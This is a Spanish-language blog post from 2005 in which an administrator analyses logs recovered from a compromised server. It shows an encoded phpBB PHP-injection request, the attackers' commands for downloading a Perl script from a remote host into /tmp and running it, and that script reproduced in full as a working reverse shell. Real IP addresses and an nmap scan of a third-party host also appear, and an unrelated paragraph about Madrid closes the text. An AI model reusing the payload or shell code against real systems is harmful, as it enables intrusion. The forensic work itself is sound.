Parece que la controladora del nuevo ordenador es algo mejor que la del
antiguo cero, y no se cuelga leyendo de disco, aunque tenga sectores
chungos como pasaba con la máquina física de cero.
Con dd conv=noerror he sacado una copia de toda la partición var de
cero, y he recuperado ficheros con las reiserfsck –rebuild-tree -S.
Así he recuperado varias cosillas, la mayoría dañadas por que se trasteó
demasiado con la partición en vez de apagar el equipo.
Pero lo mejor de todo es:
201.0.138.5 - - [15/Jan/2005:18:50:44 +0100]
“GET /viewtopic.php?t=10&highlight=%2527%252esystem(chr(101)%
252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(73)%
252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(59)%
252echr(105)%252echr(100)%252echr(59)%252echr(117)%252echr(110)%
252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%
252echr(97)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%
252echr(111)%252echr(32)%252echr(70)%252echr(73)%252echr(77))%252e%2527
HTTP/1.1″ 404 301 “-” “Linux”
Traducción una vez convertidos los caracteres unicode e interpretado el
código php:
echo INICIO;id;uname -a;echo FIM
Todas las entradas similares que he encontrado son (ya traducidas):
Desde: 201.0.138.5 (201-0-138-5.dial-up.telesp.net.br)
[15/Jan/2005:18:50:44 +0100] echo INICIO;id;uname -a;echo FIM
[15/Jan/2005:18:54:06 +0100] echo INICIO;id;uname -a;echo FIM
Desde: 81.196.69.192 (81-196-69-192.constanta.cablelink.ro)
[16/Jan/2005:17:12:16 +0100] uname -a;id;pwd;
Desde: 213.174.51.72 (k043.ims-firmen.de)
[16/Jan/2005:06:07:15 +0100] echo INICIO;id;uname -a;echo FIM
[16/Jan/2005:06:11:03 +0100] echo INICIO;lwp-download -a
http://geocities.yahoo.com.br/dominusvis/xpl/cb.txt /tmp/cb;echo FIM
Yupieeeeeeee!! aquí se baja el exploit!
[16/Jan/2005:06:12:57 +0100] echo INICIO;perl /tmp/cb 200.191.250.34
21;echo FIM
Y aquí lo ejecuta…
[15/Jan/2005:05:21:19 +0100] echo INICIO;id;uname -a;echo FIM
[15/Jan/2005:06:10:38 +0100] echo INICIO;id;uname -a;echo FIM
El cb ese es un script cutre y salchicero para poner una shell en el
puerto 21:
—————————————————————-
#!/usr/bin/perl
use strict;
use Socket;
#———————————————————>
#
# Infektion Group Back Shell
# Codigo baseado no artigo sobre sockets
# escrito por Rahul Chauhan : www.devshed.com e no bsh
# escrito por Shellc0de :)
#
# Obrigado a todos!
#
# <escrito por Dominus Vis>
#
#———————————————————>
if(@ARGV < 2){ die("Uso: $0 ip portan"); }
# inicializa alvo e porta
my $host = shift || $ARGV[0];
my $port = shift || $ARGV[1];
my $proto = getprotobyname(’tcp’);
# pega o endereço da porta
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
# cria o socket e conecta ao alvo
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die “socket: $!";
connect(SOCKET, $paddr) or die “connect: $!";
if(fork() == 0){ #cloca o processo ativo
open(STDIN, “>&SOCKET");
open(STDOUT, “>&SOCKET");
open(STDERR, “>&SOCKET");
system("/bin/sh -i"); #executa /bin/sh -i no alvo!
close(STDIN);
close(STDOUT);
close(STDERR); }
—————————————————————-
Lo que no me queda claro es si lograron entrar por ahí, o tendrían que
lanzar más comandos, por que en el puerto 21, ejecutándose como www-data
no creo que pudieran poner una shell (y deberían saberlo, que para eso
lanzan el id…
Luego debieron ponerlo en el puerto del irc, que no requiere ser root,
entrar como www-data y hacerse root con el bug del kernel que salió
anunciado recientemente.
La web http://geocities.yahoo.com.br/dominusvis/ es de lo más cutre, con
unos cuantos scripts para poner de página web y ejecutar comandos en
remoto (las imagenes tb son scripts, no imágenes reales, supongo que
para que geocities no les añada la publicidad chunga) y unas cuantas
aplicaciones de tipo scanner para windozes….
Por cierto, 213.174.51.72 es una máquina linux, con 3246 días de uptime
(aunque se puede fakear), y burradas como tener el mysql abierto. Debía
ser también hackeable, y supongo que nuestros amigos brasileños la
usaron de pasarela (lo de FIM, FIN en brasileño les delata un poco):
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2005-01-23 07:23
CET
Interesting ports on k043.ims-firmen.de (213.174.51.72):
(The 1627 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
7/tcp filtered echo
11/tcp filtered systat
15/tcp filtered netstat
19/tcp filtered chargen
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
67/tcp filtered dhcpserver
69/tcp filtered tftp
79/tcp filtered finger
80/tcp open http
111/tcp filtered rpcbind
119/tcp filtered nntp
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
515/tcp filtered printer
617/tcp filtered sco-dtmgr
901/tcp filtered samba-swat
1214/tcp filtered fasttrack
1248/tcp filtered hermes
1433/tcp filtered ms-sql-s
1434/tcp filtered ms-sql-m
2001/tcp filtered dc
2002/tcp filtered globe
3306/tcp open mysql
4660/tcp filtered mosmig
6346/tcp filtered gnutella
6699/tcp filtered napster
Device type: general purpose
Running: Linux 2.4.X|2.5.X
OS details: Linux Kernel 2.4.0 - 2.5.20
Uptime 3.246 days (since Thu Jan 20 01:29:25 2005)
No, el puerto 21 es un ftp normal, no una shell… que ha sido lo
primero que he probado. :)))
Estoy por denunciar la primera IP de todas al proveedor, a ver si les
hacen algo, por que tenía pinta de no ser un server que ya hubieran
hackeado.
Saludosssssssssssssss!
–
!) bisho! -=] 23/01/2005 [=-
! ‘, _
! ) ·>
? ) :: Don’t promote SW Monopolies. Say NO to software ::
,???—’ :: patents ::
[ PEACE ] :: EuropeSwPatentFree Demostration: ::
……:: http://online-demo.org ::
Me encanta Madrid en agosto. Sigue siendo Madrid, con su juerga, con la mayoría de sus bares y con bastante gente, pero está libre de la plaga de la masificación. Encima estos días que está lloviendo y refrescando, y se puede salir incluso por la tarde a dar una vuelta sin que se peguen los pies al asfalto y morir deshidratado en cualquier esquina.
